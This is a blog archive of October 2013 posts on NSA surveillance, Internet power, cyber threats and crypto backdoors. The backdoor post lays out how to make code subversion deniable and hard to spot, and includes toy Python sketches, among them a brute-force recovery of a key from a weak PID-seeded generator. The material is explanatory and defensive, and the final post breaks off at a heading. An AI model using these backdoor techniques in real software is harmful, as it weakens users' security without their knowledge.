Blog: October 2013 Archives

NSA Eavesdropping on Google and Yahoo Networks

The Washington Post reported that the NSA is eavesdropping on the Google and Yahoo private networks—the code name for the program is MUSCULAR. I may write more about this later, but I have some initial comments:

  • It’s a measure of how far off the rails the NSA has gone that it’s taking its Cold War–era tactics—surreptitiously eavesdropping on foreign networks—and applying them to US corporations. It’s skirting US law by targeting the portion of these corporate networks outside the US. It’s the same sort of legal argument the NSA used to justify collecting address books and buddy lists worldwide.
  • Although the Washington Post article specifically talks about Google and Yahoo, you have to assume that all the other major—and many of the minor—cloud services are compromised this same way. That means Microsoft, Apple, Facebook, Twitter, MySpace, Badoo, Dropbox, and on and on and on.
  • It is well worth re-reading all the government denials about bulk collection and direct access after PRISM was exposed. It seems that it’s impossible to get the truth out of the NSA. Its carefully worded denials always seem to hide what’s really going on.
  • In light of this, PRISM is really just insurance: a way for the NSA to get legal cover for information it already has. My guess is that the NSA collects the vast majority of its data surreptitiously, using programs such as these. Then, when it has to share the information with the FBI or other organizations, it gets it again through a more public program like PRISM.
  • What this really shows is how robust the surveillance state is, and how hard it will be to craft laws reining in the NSA. All the bills being discussed so far only address portions of the problem: specific programs or specific legal justifications. But the NSA’s surveillance infrastructure is much more robust than that. It has many ways into our data, and all sorts of tricks to get around the law. Note this quote from yesterday’s story:

    John Schindler, a former NSA chief analyst and frequent defender who teaches at the Naval War College, said it is obvious why the agency would prefer to avoid restrictions where it can.

    “Look, NSA has platoons of lawyers, and their entire job is figuring out how to stay within the law and maximize collection by exploiting every loophole,” he said. “It’s fair to say the rules are less restrictive under Executive Order 12333 than they are under FISA,” the Foreign Intelligence Surveillance Act.

    No surprise, really. But it illustrates how difficult meaningful reform will be. I wrote this in September:

    It’s time to start cleaning up this mess. We need a special prosecutor, one not tied to the military, the corporations complicit in these programs, or the current political leadership, whether Democrat or Republican. This prosecutor needs free rein to go through the NSA’s files and discover the full extent of what the agency is doing, as well as enough technical staff who have the capability to understand it. He needs the power to subpoena government officials and take their sworn testimony. He needs the ability to bring criminal indictments where appropriate. And, of course, he needs the requisite security clearance to see it all.

    We also need something like South Africa’s Truth and Reconciliation Commission, where both government and corporate employees can come forward and tell their stories about NSA eavesdropping without fear of reprisal.

    Without this, crafting reform legislation will be impossible.

  • Finally, we need more encryption on the Internet. We have made surveillance too cheap, not just for the NSA but for all nation-state adversaries. We need to make it expensive again.

EDITED TO ADD (11/1): We don’t actually know if the NSA did this surreptitiously, or if it had assistance from another US corporation. Level 3 Communications provides the data links to Google, and its statement was sufficiently non-informative as to be suspicious:

In a statement, Level 3 said: “We comply with the laws in each country where we operate. In general, governments that seek assistance in law enforcement or security investigations prohibit disclosure of the assistance provided.”

When I write that the NSA has destroyed the fabric of trust on the Internet, this is the kind of thing I mean. Google can no longer trust its bandwidth providers not to betray the company.

EDITED TO ADD (11/2): The NSA’s denial is pretty lame. It feels as if it’s hardly trying anymore.

We also know that Level 3 Communications already cooperates with the NSA, and has the codename of LITTLE:

The document identified for the first time which telecoms companies are working with GCHQ’s “special source” team. It gives top secret codenames for each firm, with BT (“Remedy”), Verizon Business (“Dacron”), and Vodafone Cable (“Gerontic”). The other firms include Global Crossing (“Pinnage”), Level 3 (“Little”), Viatel (“Vitreous”) and Interoute (“Streetcar”).

Again, those code names should properly be in all caps.

EDITED TO ADD (11/5): More details on the program.

Posted on October 31, 2013 at 10:29 AM

The Battle for Power on the Internet

We’re in the middle of an epic battle for power in cyberspace. On one side are the traditional, organized, institutional powers such as governments and large multinational corporations. On the other are the distributed and nimble: grassroots movements, dissident groups, hackers, and criminals. Initially, the Internet empowered the second side. It gave them a place to coordinate and communicate efficiently, and made them seem unbeatable. But now, the more traditional institutional powers are winning, and winning big. How these two sides fare in the long term, and the fate of the rest of us who don’t fall into either group, is an open question—and one vitally important to the future of the Internet.

In the Internet’s early days, there was a lot of talk about its “natural laws”—how it would upend traditional power blocs, empower the masses, and spread freedom throughout the world. The international nature of the Internet circumvented national laws. Anonymity was easy. Censorship was impossible. Police were clueless about cybercrime. And bigger changes seemed inevitable. Digital cash would undermine national sovereignty. Citizen journalism would topple traditional media, corporate PR, and political parties. Easy digital copying would destroy the traditional movie and music industries. Web marketing would allow even the smallest companies to compete against corporate giants. It really would be a new world order.

This was a utopian vision, but some of it did come to pass. Internet marketing has transformed commerce. The entertainment industries have been transformed by things like MySpace and YouTube, and are now more open to outsiders. Mass media has changed dramatically, and some of the most influential people in the media have come from the blogging world. There are new ways to organize politically and run elections. Crowdfunding has made it possible to finance tens of thousands of projects, and crowdsourcing has made more types of projects possible. Facebook and Twitter really did help topple governments.

But that is just one side of the Internet’s disruptive character. The Internet has emboldened traditional power as well.

On the corporate side, power is consolidating, a result of two current trends in computing. First, the rise of cloud computing means that we no longer have control of our data. Our e-mail, photos, calendars, address books, messages, and documents are on servers belonging to Google, Apple, Microsoft, Facebook, and so on. And second, we are increasingly accessing our data using devices that we have much less control over: iPhones, iPads, Android phones, Kindles, ChromeBooks, and so on. Unlike traditional operating systems, those devices are controlled much more tightly by the vendors, who limit what software can run, what it can do, how the devices are updated, and so on. Even Windows 8 and Apple’s Mountain Lion operating system are heading in the direction of more vendor control.

I have previously characterized this model of computing as “feudal.” Users pledge their allegiance to more powerful companies who, in turn, promise to protect them from both sysadmin duties and security threats. It’s a metaphor that’s rich in history and in fiction, and a model that’s increasingly permeating computing today.

Medieval feudalism was a hierarchical political system, with obligations in both directions. Lords offered protection, and vassals offered service. The lord-peasant relationship was similar, with a much greater power differential. It was a response to a dangerous world.

Feudal security consolidates power in the hands of the few. Internet companies, like lords before them, act in their own self-interest. They use their relationship with us to increase their profits, sometimes at our expense. They act arbitrarily. They make mistakes. They’re deliberately—and incidentally—changing social norms. Medieval feudalism gave the lords vast powers over the landless peasants; we’re seeing the same thing on the Internet.

It’s not all bad, of course. We, especially those of us who are not technical, like the convenience, redundancy, portability, automation, and shareability of vendor-managed devices. We like cloud backup. We like automatic updates. We like not having to deal with security ourselves. We like that Facebook just works—from any device, anywhere.

Government power is also increasing on the Internet. There is more government surveillance than ever before. There is more government censorship than ever before. There is more government propaganda, and an increasing number of governments are controlling what their users can and cannot do on the Internet. Totalitarian governments are embracing a growing “cyber sovereignty” movement to further consolidate their power. And the cyberwar arms race is on, pumping an enormous amount of money into cyber-weapons and consolidated cyber-defenses, further increasing government power.

In many cases, the interests of corporate and government powers are aligning. Both corporations and governments benefit from ubiquitous surveillance, and the NSA is using Google, Facebook, Verizon, and others to get access to data it couldn’t otherwise. The entertainment industry is looking to governments to enforce its antiquated business models. Commercial security equipment from companies like BlueCoat and Sophos is being used by oppressive governments to surveil and censor their citizens. The same facial recognition technology that Disney uses in its theme parks can also identify protesters in China and Occupy Wall Street activists in New York. Think of it as a public/private surveillance partnership.

What happened? How, in those early Internet years, did we get the future so wrong?

The truth is that technology magnifies power in general, but rates of adoption are different. The unorganized, the distributed, the marginal, the dissidents, the powerless, the criminal: they can make use of new technologies very quickly. And when those groups discovered the Internet, suddenly they had power. But later, when the already-powerful big institutions finally figured out how to harness the Internet, they had more power to magnify. That’s the difference: the distributed were more nimble and were faster to make use of their new power, while the institutional were slower but were able to use their power more effectively.

So while the Syrian dissidents used Facebook to organize, the Syrian government used Facebook to identify dissidents to arrest.

All isn’t lost for distributed power, though. For institutional power, the Internet is a change in degree, but for distributed power, it’s a qualitative one. The Internet gives decentralized groups—for the first time—the ability to coordinate. This can have incredible ramifications, as we saw in the SOPA/PIPA debate, Gezi, Brazil, and the rising use of crowdfunding. It can invert power dynamics, even in the presence of surveillance, censorship, and use control. But aside from political coordination, the Internet allows for social coordination as well—to unite, for example, ethnic diasporas, gender minorities, sufferers of rare diseases, and people with obscure interests.

This isn’t static: Technological advances continue to provide advantage to the nimble. I discussed this trend in my book Liars and Outliers. If you think of security as an arms race between attackers and defenders, any technological advance gives one side or the other a temporary advantage. But most of the time, a new technology benefits the nimble first. They are not hindered by bureaucracy—and sometimes not by laws or ethics, either. They can evolve faster.

We saw it with the Internet. As soon as the Internet started being used for commerce, a new breed of cybercriminal emerged, immediately able to take advantage of the new technology. It took police a decade to catch up. And we saw it on social media, as political dissidents made use of its organizational powers before totalitarian regimes did.

This delay is what I call a “security gap.” It’s greater when there’s more technology, and in times of rapid technological change. Basically, if there are more innovations to exploit, there will be more damage resulting from society’s inability to keep up with exploiters of all of them. And since our world is one in which there’s more technology than ever before, and a faster rate of technological change than ever before, we should expect to see a greater security gap than ever before. In other words, there will be an increasing time period during which nimble distributed powers can make use of new technologies before slow institutional powers can make better use of those technologies.

This is the battle: quick vs. strong. To return to medieval metaphors, you can think of a nimble distributed power—whether marginal, dissident, or criminal—as Robin Hood; and ponderous institutional powers—both government and corporate—as the feudal lords.

So who wins? Which type of power dominates in the coming decades?

Right now, it looks like traditional power. Ubiquitous surveillance means that it’s easier for the government to identify dissidents than it is for the dissidents to remain anonymous. Data monitoring means it’s easier for the Great Firewall of China to block data than it is for people to circumvent it. The way we all use the Internet makes it much easier for the NSA to spy on everyone than it is for anyone to maintain privacy. And even though it is easy to circumvent digital copy protection, most users still can’t do it.

The problem is that leveraging Internet power requires technical expertise. Those with sufficient ability will be able to stay ahead of institutional powers. Whether it’s setting up your own e-mail server, effectively using encryption and anonymity tools, or breaking copy protection, there will always be technologies that can evade institutional powers. This is why cybercrime is still pervasive, even as police savvy increases; why technically capable whistleblowers can do so much damage; and why organizations like Anonymous are still a viable social and political force. Assuming technology continues to advance—and there’s no reason to believe it won’t—there will always be a security gap in which technically advanced Robin Hoods can operate.

Most people, though, are stuck in the middle. These are people who don’t have the technical ability to evade large governments and corporations, avoid the criminal and hacker groups who prey on us, or join any resistance or dissident movements. These are the people who accept default configuration options, arbitrary terms of service, NSA-installed back doors, and the occasional complete loss of their data. These are the people who get increasingly isolated as government and corporate power align. In the feudal world, these are the hapless peasants. And it’s even worse when the feudal lords—or any powers—fight each other. As anyone watching Game of Thrones knows, peasants get trampled when powers fight: when Facebook, Google, Apple, and Amazon fight it out in the market; when the US, EU, China, and Russia fight it out in geopolitics; or when it’s the US vs. “the terrorists” or China vs. its dissidents.

The abuse will only get worse as technology continues to advance. In the battle between institutional power and distributed power, more technology means more damage. We’ve already seen this: Cybercriminals can rob more people more quickly than criminals who have to physically visit everyone they rob. Digital pirates can make more copies of more things much more quickly than their analog forebears. And we’ll see it in the future: 3D printers mean that the computer restriction debate will soon involve guns, not movies. Big data will mean that more companies will be able to identify and track you more easily. It’s the same problem as the “weapons of mass destruction” fear: terrorists with nuclear or biological weapons can do a lot more damage than terrorists with conventional explosives. And by the same token, terrorists with large-scale cyberweapons can potentially do more damage than terrorists with those same bombs.

It’s a numbers game. Very broadly, because of the way humans behave as a species and as a society, every society is going to have a certain amount of crime. And there’s a particular crime rate society is willing to tolerate. With historically inefficient criminals, we were willing to live with some percentage of criminals in our society. As technology makes each individual criminal more powerful, the percentage we can tolerate decreases. Again, remember the “weapons of mass destruction” debate: As the amount of damage each individual terrorist can do increases, we need to do increasingly more to prevent even a single terrorist from succeeding.

The more destabilizing the technologies, the greater the rhetoric of fear, and the stronger institutional powers will get. This means increasingly repressive security measures, even if the security gap means that such measures become increasingly ineffective. And it will squeeze the peasants in the middle even more.

Without the protection of his own feudal lord, the peasant was subject to abuse both by criminals and other feudal lords. But both corporations and the government—and often the two in cahoots—are using their power to their own advantage, trampling on our rights in the process. And without the technical savvy to become Robin Hoods ourselves, we have no recourse but to submit to whatever the ruling institutional power wants.

So what happens as technology increases? Is a police state the only effective way to control distributed power and keep our society safe? Or do the fringe elements inevitably destroy society as technology increases their power? Probably neither doomsday scenario will come to pass, but figuring out a stable middle ground is hard. These questions are complicated, and dependent on future technological advances that we cannot predict. But they are primarily political questions, and any solutions will be political.

In the short term, we need more transparency and oversight. The more we know of what institutional powers are doing, the more we can trust that they are not abusing their authority. We have long known this to be true in government, but we have increasingly ignored it in our fear of terrorism and other modern threats. This is also true for corporate power. Unfortunately, market dynamics will not necessarily force corporations to be transparent; we need laws to do that. The same is true for decentralized power; transparency is how we’ll differentiate political dissidents from criminal organizations.

Oversight is also critically important, and is another long-understood mechanism for checking power. This can be a combination of things: courts that act as third-party advocates for the rule of law rather than rubber-stamp organizations, legislatures that understand the technologies and how they affect power balances, and vibrant public-sector press and watchdog groups that analyze and debate the actions of those wielding power.

Transparency and oversight give us the confidence to trust institutional powers to fight the bad side of distributed power, while still allowing the good side to flourish. For if we’re going to entrust our security to institutional powers, we need to know they will act in our interests and not abuse that power. Otherwise, democracy fails.

In the longer term, we need to work to reduce power differences. The key to all of this is access to data. On the Internet, data is power. To the extent the powerless have access to it, they gain in power. To the extent that the already powerful have access to it, they further consolidate their power. As we look to reducing power imbalances, we have to look at data: data privacy for individuals, mandatory disclosure laws for corporations, and open government laws.

Medieval feudalism evolved into a more balanced relationship in which lords had responsibilities as well as rights. Today’s Internet feudalism is both ad-hoc and one-sided. Those in power have a lot of rights, but increasingly few responsibilities or limits. We need to rebalance this relationship. In medieval Europe, the rise of the centralized state and the rule of law provided the stability that feudalism lacked. The Magna Carta first forced responsibilities on governments and put humans on the long road toward government by the people and for the people. In addition to again reining in government power, we need similar restrictions on corporate power: a new Magna Carta focused on the institutions that abuse power in the 21st century.

Today’s Internet is a fortuitous accident: a combination of an initial lack of commercial interests, government benign neglect, military requirements for survivability and resilience, and computer engineers building open systems that worked simply and easily.

We’re at the beginning of some critical debates about the future of the Internet: the proper role of law enforcement, the character of ubiquitous surveillance, the collection and retention of our entire life’s history, how automatic algorithms should judge us, government control over the Internet, cyberwar rules of engagement, national sovereignty on the Internet, limitations on the power of corporations over our data, the ramifications of information consumerism, and so on.

Data is the pollution problem of the information age. All computer processes produce it. It stays around. How we deal with it—how we reuse and recycle it, who has access to it, how we dispose of it, and what laws regulate it—is central to how the information age functions. And I believe that just as we look back at the early decades of the industrial age and wonder how society could ignore pollution in its rush to build an industrial world, our grandchildren will look back at us during these early decades of the information age and judge us on how we dealt with the rebalancing of power resulting from all this new data.

This won’t be an easy period for us as we try to work these issues out. Historically, no shift in power has ever been easy. Corporations have turned our personal data into an enormous revenue generator, and they’re not going to back down. Neither will governments, who have harnessed that same data for their own purposes. But we have a duty to tackle this problem.

I can’t tell you what the result will be. These are all complicated issues, and require meaningful debate, international cooperation, and innovative solutions. We need to decide on the proper balance between institutional and decentralized power, and how to build tools that amplify what is good in each while suppressing the bad.

This essay previously appeared in the Atlantic.

EDITED TO ADD (11/5): This essay has been translated into Danish.

Posted on October 30, 2013 at 6:50 AM

Understanding the Threats in Cyberspace

The primary difficulty of cyber security isn’t technology—it’s policy. The Internet mirrors real-world society, which makes security policy online as complicated as it is in the real world. Protecting critical infrastructure against cyber-attack is just one of cyberspace’s many security challenges, so it’s important to understand them all before any one of them can be solved.

The list of bad actors in cyberspace is long, and spans a wide range of motives and capabilities. At the extreme end there’s cyberwar: destructive actions by governments during a war. When government policymakers like David Omand think of cyber-attacks, that’s what comes to mind. Cyberwar is conducted by capable and well-funded groups and involves military operations against both military and civilian targets. Along much the same lines are non-nation state actors who conduct terrorist operations. Although less capable and well-funded, they are often talked about in the same breath as true cyberwar.

Much more common are the domestic and international criminals who run the gamut from lone individuals to organized crime. They can be very capable and well-funded and will continue to inflict significant economic damage.

Threats from peacetime governments have been seen increasingly in the news. The US worries about Chinese espionage against Western targets, and we’re also seeing US surveillance of pretty much everyone in the world, including Americans inside the US. The National Security Agency (NSA) is probably the most capable and well-funded espionage organization in the world, and we’re still learning about the full extent of its sometimes illegal operations.

Hacktivists are a different threat. Their actions range from Internet-age acts of civil disobedience to the inflicting of actual damage. This is hard to generalize about because the individuals and groups in this category vary so much in skill, funding and motivation. Hackers falling under the “Anonymous” aegis—it really isn’t correct to call them a group—come under this category, as does WikiLeaks. Most of these attackers are outside the target organization, although whistleblowing—the civil disobedience of the information age—generally involves insiders like Edward Snowden.

This list of potential network attackers isn’t exhaustive. Depending on who you are and what your organization does, you might also be concerned with espionage cyber-attacks by the media, rival corporations or even the corporations we entrust with our data.

The issue here, and why it affects policy, is that protecting against these various threats can lead to contradictory requirements. In the US, the NSA’s post-9/11 mission to protect the country from terrorists has transformed it into a domestic surveillance organization. The NSA’s need to protect its own information systems from outside attack opened it up to attacks from within. Do the corporate security products we buy to protect ourselves against cybercrime contain backdoors that allow for government spying? European countries may condemn the US for spying on its own citizens, but do they do the same thing?

All these questions are especially difficult because military and security organizations, along with corporations, tend to hype particular threats. For example, cyberwar and cyberterrorism are greatly overblown as threats—because hyping them results in massive government programs with huge budgets and power—while cybercrime is largely downplayed.

We need greater transparency, oversight and accountability on both the government and corporate sides before we can move forward. With the secrecy that surrounds cyber-attack and cyberdefense it’s hard to be optimistic.

This essay previously appeared in Europe’s World.

Posted on October 28, 2013 at 6:39 AM

US Government Monitoring Public Internet in Real Time

Here’s a demonstration of the US government’s capabilities to monitor the public Internet. Former CIA and NSA Director Michael Hayden was on the Acela train between New York and Washington DC, taking press interviews on the phone. Someone nearby overheard the conversation, and started tweeting about it. Within 15 or so minutes, someone somewhere noticed the tweets, and informed someone who knew Hayden. That person called Hayden on his cell phone and, presumably, told him to shut up.

Nothing covert here; the tweets were public. But still, wow.

EDITED TO ADD: To clarify, I don’t think this was a result of the NSA monitoring the Internet. I think this was some public relations office—probably the one that is helping General Alexander respond to all the Snowden stories—that is searching the public Twitter feed for, among other things, Hayden’s name.

Posted on October 26, 2013 at 5:43 PM

Book Review: Cyber War Will Not Take Place

Thomas Rid, Cyber War Will Not Take Place, Oxford University Press, 2013.

Cyber war is possibly the most dangerous buzzword of the Internet era. The fear-inducing rhetoric surrounding it is being used to justify major changes in the way the Internet is organized, governed, and constructed. And in Cyber War Will Not Take Place, Thomas Rid convincingly argues that cyber war is not a compelling threat. Rid is one of the leading cyber war skeptics in Europe, and although he doesn’t argue that war won’t extend into cyberspace, he says that cyberspace’s role in war is more limited than doomsayers want us to believe. His argument against cyber war is lucid and methodical. He divides “offensive and violent political acts” in cyberspace into three categories: sabotage, espionage, and subversion. These categories are larger than cyberspace, of course, but Rid spends considerable time analyzing their strengths and limitations within cyberspace. The details are complicated, but his conclusion is that many of these types of attacks cannot be defined as acts of war, and any future war won’t involve many of these types of attacks.

None of this is meant to imply that cyberspace is safe. Threats of all sorts fill cyberspace, but not threats of war. As such, the policies to defend against them are different. While hackers and criminal threats get all the headlines, more worrisome are the threats from governments seeking to consolidate their power. I have long argued that controlling the Internet has become critical for totalitarian states; their four broad tools—surveillance, censorship, propaganda, and use control—also have legitimate commercial applications and are employed by democracies as well.

A lot of the problem here is of definition. There isn’t broad agreement as to what constitutes cyber war, and this confusion plays into the hands of those hyping its threat. If everything from Chinese espionage to Russian criminal extortion to activist disruption falls under the cyber war umbrella, then it only makes sense to put more of the Internet under government—and thus military—control. Rid’s book is a compelling counter-argument to this approach.

Rid’s final chapter is an essay unto itself, and lays out his vision as to how we should deal with threats in cyberspace. For policymakers who won’t sit through an entire book, this is the chapter I would urge them to read. Arms races are dangerous and destabilizing, and we’re in the early years of a cyber war arms race that’s being fueled by fear and ignorance. This book is a cogent counterpoint to the doomsayers and the profiteers, and should be required reading for anyone concerned about security in cyberspace.

This book review previously appeared in Europe’s World.

Posted on October 25, 2013 at 9:26 AM

Cognitive Biases About Violence as a Negotiating Tactic

Interesting paper: Max Abrahms, “The Credibility Paradox: Violence as a Double-Edged Sword in International Politics,” International Studies Quarterly, 2013:

Abstract: Implicit in the rationalist literature on bargaining over the last half-century is the political utility of violence. Given our anarchical international system populated with egoistic actors, violence is thought to promote concessions by lending credibility to their threats. From the vantage of bargaining theory, then, empirical research on terrorism poses a puzzle. For non-state actors, terrorism signals a credible threat in comparison to less extreme tactical alternatives. In recent years, however, a spate of studies across disciplines and methodologies has nonetheless found that neither escalating to terrorism nor with terrorism encourages government concessions. In fact, perpetrating terrorist acts reportedly lowers the likelihood of government compliance, particularly as the civilian casualties rise. The apparent tendency for this extreme form of violence to impede concessions challenges the external validity of bargaining theory, as traditionally understood. In this study, I propose and test an important psychological refinement to the standard rationalist narrative. Via an experiment on a national sample of adults, I find evidence of a newfound cognitive heuristic undermining the coercive logic of escalation enshrined in bargaining theory. Due to this oversight, mainstream bargaining theory overestimates the political utility of violence, particularly as an instrument of coercion.

Posted on October 25, 2013 at 6:30 AM

DARPA Contest for Fully Automated Network Defense

DARPA is looking for a fully automated network defense system:

What if computers had a “check engine” light that could indicate new, novel security problems? What if computers could go one step further and heal security problems before they happen?

To find out, the Defense Advanced Research Projects Agency (DARPA) intends to hold the Cyber Grand Challenge (CGC)—the first-ever tournament for fully automatic network defense systems. DARPA envisions teams creating automated systems that would compete against each other to evaluate software, test for vulnerabilities, generate security patches and apply them to protected computers on a network. To succeed, competitors must bridge the expert gap between security software and cutting-edge program analysis research. The winning team would receive a cash prize of $2 million.

Some news articles. Slashdot thread. Reddit thread.

Posted on October 24, 2013 at 8:45 AM

Code Names for NSA Exploit Tools

This is from a Snowden document released by Le Monde:

General Term Descriptions:

HIGHLANDS: Collection from Implants
VAGRANT: Collection of Computer Screens
MAGNETIC: Sensor Collection of Magnetic Emanations
MINERALIZE: Collection from LAN Implant
OCEAN: Optical Collection System for Raster-Based Computer Screens
LIFESAFER: Imaging of the Hard Drive
GENIE: Multi-stage operation: jumping the airgap etc.
BLACKHEART: Collection from an FBI Implant
[…]
DROPMIRE: Passive collection of emanations using antenna
CUSTOMS: Customs opportunities (not LIFESAVER)
DROPMIRE: Laser printer collection, purely proximal access (***NOT*** implanted)
DEWSWEEPER: USB (Universal Serial Bus) hardware host tap that provides COVERT link over USB link into a target network. Operates w/RF relay subsystem to provide wireless Bridge into target network.
RADON: Bi-directional host tap that can inject Ethernet packets onto the same targets. Allows bi-directional exploitation of denied networks using standard on-net tools.

There’s a lot to think about in this list. RADON and DEWSWEEPER seem particularly interesting.

Posted on October 23, 2013 at 10:03 AM

Dry Ice Bombs at LAX

The news story about the guy who left dry ice bombs in restricted areas of LAX is really weird.

I can’t get worked up over it, though. Dry ice bombs are a harmless prank. I set off a bunch of them when I was in college—although I used liquid nitrogen, because I was impatient. I know of someone who set a few off over the summer, just for fun. They do make a very satisfying boom.

Having them set off in a secure airport area doesn’t illustrate any new vulnerabilities. We already know that trusted people can subvert security systems. So what?

I’ve done a bunch of press interviews on this. One radio announcer really didn’t like my nonchalance. He really wanted me to complain about the lack of cameras at LAX, and was unhappy when I pointed out that we didn’t need cameras to catch this guy.

I like my kicker quote in this article:

Various people, including former Los Angeles Police Chief William Bratton, have called LAX the No. 1 terrorist target on the West Coast. But while an Algerian man discovered with a bomb at the Canadian border in 1999 was sentenced to 37 years in prison in connection with a plot to cause damage at LAX, Schneier said that assessment by Bratton is probably not true.

“Where can you possibly get that data?” he said. “I don’t think terrorists respond to opinion polls about how juicy targets are.”

Posted on October 23, 2013 at 5:35 AM

Can I Be Trusted?

Slashdot asks the question:

I’m a big fan of Bruce Schneier, but just to play devil’s advocate, let’s say, hypothetically, that Schneier is actually in cahoots with the NSA. Who better to reinstate public trust in weakened cryptosystems? As an exercise in security that Schneier himself may find interesting, what methods are available for proving (or at least affirming) that we can trust Bruce Schneier?

So far, I haven’t seen any good reasons why I might be untrustworthy. I’d help, but that seems unfair.

Posted on October 22, 2013 at 11:32 AM

Defending Against Crypto Backdoors

We already know the NSA wants to eavesdrop on the Internet. It has secret agreements with telcos to get direct access to bulk Internet traffic. It has massive systems like TUMULT, TURMOIL, and TURBULENCE to sift through it all. And it can identify ciphertext—encrypted information—and figure out which programs could have created it.
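
How that identification works at the NSA’s scale is classified, but the basic heuristic is simple: ciphertext looks statistically random, so high byte entropy makes a good first-pass filter. A minimal sketch of the idea in Python, purely illustrative and nothing to do with the NSA’s actual tooling:

    import math
    import os
    from collections import Counter

    def byte_entropy(data: bytes) -> float:
        """Shannon entropy in bits per byte (0.0 to 8.0)."""
        if not data:
            return 0.0
        total = len(data)
        return -sum((n / total) * math.log2(n / total)
                    for n in Counter(data).values())

    def looks_encrypted(data: bytes, threshold: float = 7.9) -> bool:
        # Ciphertext and well-compressed data both approach 8 bits/byte;
        # telling them apart requires headers, lengths, and protocol
        # context, which is where the real analysis effort goes.
        return byte_entropy(data) > threshold

    print(byte_entropy(b"attack at dawn " * 300))  # repetitive English text: about 2.7
    print(byte_entropy(os.urandom(4096)))          # random bytes: close to 8.0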

But what the NSA wants is to be able to read that encrypted information in as close to real-time as possible. It wants backdoors, just like the cybercriminals and less benevolent governments do.

And we have to figure out how to make it harder for them, or anyone else, to insert those backdoors.

How the NSA Gets Its Backdoors

The FBI tried to get backdoor access embedded in an AT&T secure telephone system in the mid-1990s. The Clipper Chip included something called a LEAF: a Law Enforcement Access Field. The LEAF was the key used to encrypt the phone conversation, itself encrypted with a special key known to the FBI, and it was transmitted along with the phone conversation. An FBI eavesdropper could intercept the LEAF and decrypt it, then use the data to eavesdrop on the phone call.
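
As a toy model of the LEAF mechanism (wrap the per-call session key under a key the eavesdropper holds, and send it alongside the traffic), here is a minimal sketch using the Python cryptography library’s Fernet construction. The real Clipper design used Skipjack, per-device unit keys split between two escrow agents, and an integrity checksum; this only shows the shape of the idea:

    from cryptography.fernet import Fernet

    # Key held by the escrow agent (the eavesdropper, in practice).
    escrow_key = Fernet.generate_key()
    escrow = Fernet(escrow_key)

    def encrypt_call(plaintext: bytes):
        session_key = Fernet.generate_key()    # fresh key per conversation
        ciphertext = Fernet(session_key).encrypt(plaintext)
        leaf = escrow.encrypt(session_key)     # session key wrapped for the eavesdropper
        return ciphertext, leaf                # both travel together on the wire

    def eavesdrop(ciphertext: bytes, leaf: bytes) -> bytes:
        # Whoever holds the escrow key unwraps the session key from the
        # LEAF and reads the call -- no access to either endpoint needed.
        session_key = escrow.decrypt(leaf)
        return Fernet(session_key).decrypt(ciphertext)

    ct, leaf = encrypt_call(b"hello, this call is 'secure'")
    print(eavesdrop(ct, leaf))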

But the Clipper Chip faced severe backlash, and became defunct a few years after being announced.

Having lost that public battle, the NSA decided to get its backdoors through subterfuge: by asking nicely, pressuring, threatening, bribing, or mandating through secret order. The general name for this program is BULLRUN.

Defending against these attacks is difficult. We know from subliminal channel and kleptography research that it’s pretty much impossible to guarantee that a complex piece of software isn’t leaking secret information. We know from Ken Thompson’s famous talk on “trusting trust” (his ACM Turing Award lecture) that you can never be totally sure if there’s a security flaw in your software.

Since BULLRUN became public last month, the security community has been examining security flaws discovered over the past several years, looking for signs of deliberate tampering. The Debian random number flaw was probably not deliberate, but the 2003 Linux security vulnerability probably was. The DUAL_EC_DRBG random number generator may or may not have been a backdoor. The SSL 2.0 flaw was probably an honest mistake. The GSM A5/1 encryption algorithm was almost certainly deliberately weakened. All the common RSA moduli out there in the wild: we don’t know. Microsoft’s _NSAKEY looks like a smoking gun, but honestly, we don’t know.
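
The Debian flaw is worth a closer look because it shows how small the visible change can be: a patch removed most of the entropy feeding OpenSSL’s generator, leaving the process ID as essentially the only varying input, so only about 32,768 distinct keys were possible. A toy sketch of why a seed space that small is fatal; this is not the actual OpenSSL code, just the arithmetic of the failure:

    import random

    PID_MAX = 32768  # the traditional Linux process-ID space

    def weak_keygen(pid: int, nbytes: int = 16) -> bytes:
        # Stand-in for a generator whose only real entropy is the PID.
        rng = random.Random(pid)
        return bytes(rng.getrandbits(8) for _ in range(nbytes))

    victim_key = weak_keygen(pid=4242)   # a victim's "random" key

    # The attacker simply enumerates every possible seed.
    recovered_pid = next(pid for pid in range(PID_MAX)
                         if weak_keygen(pid) == victim_key)
    print("key recovered from pid", recovered_pid)  # 4242, after at most 32,768 tries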

How the NSA Designs Backdoors

While a separate program that sends our data to some IP address somewhere is certainly how any hacker—from the lowliest script kiddie up to the NSA—spies on our computers, it’s too labor-intensive to work in the general case.

For government eavesdroppers like the NSA, subtlety is critical. In particular, three characteristics are important:

  • Low discoverability. The less the backdoor affects the normal operations of the program, the better. Ideally, it shouldn’t affect functionality at all. The smaller the backdoor is, the better. Ideally, it should just look like normal functional code. As a blatant example, an email encryption backdoor that appends a plaintext copy to the encrypted copy is much less desirable than a backdoor that reuses most of the key bits in a public IV (initialization vector).
  • High deniability. If discovered, the backdoor should look like a mistake. It could be a single opcode change. Or maybe a “mistyped” constant. Or “accidentally” reusing a single-use key multiple times. This is the main reason I am skeptical about _NSAKEY as a deliberate backdoor, and why so many people don’t believe the DUAL_EC_DRBG backdoor is real: they’re both too obvious.
  • Minimal conspiracy. The more people who know about the backdoor, the more likely the secret is to get out. So any good backdoor should be known to very few people. That’s why the recently described potential vulnerability in Intel’s random number generator worries me so much; one person could make this change during mask generation, and no one else would know.

These characteristics imply several things:

  • A closed-source system is safer to subvert, because an open-source system comes with a greater risk of that subversion being discovered. On the other hand, a big open-source system with a lot of developers and sloppy version control is easier to subvert.
  • If a software system only has to interoperate with itself, then it is easier to subvert. For example, a closed VPN encryption system only has to interoperate with other instances of that same proprietary system. This is easier to subvert than an industry-wide VPN standard that has to interoperate with equipment from other vendors.
  • A commercial software system is easier to subvert, because the profit motive provides a strong incentive for the company to go along with the NSA’s requests.
  • Protocols developed by large open standards bodies are harder to influence, because a lot of eyes are paying attention. Systems designed by closed standards bodies are easier to influence, especially if the people involved in the standards don’t really understand security.
  • Systems that send seemingly random information in the clear are easier to subvert. One of the most effective ways of subverting a system is by leaking key information—recall the LEAF—and modifying random nonces or header information is the easiest way to do that.

Design Strategies for Defending against Backdoors

With these principles in mind, we can list design strategies. None of them is foolproof, but they are all useful. I’m sure there are more; this list isn’t meant to be exhaustive, nor the final word on the topic. It’s simply a starting place for discussion. But it won’t work unless customers start demanding software with this sort of transparency.

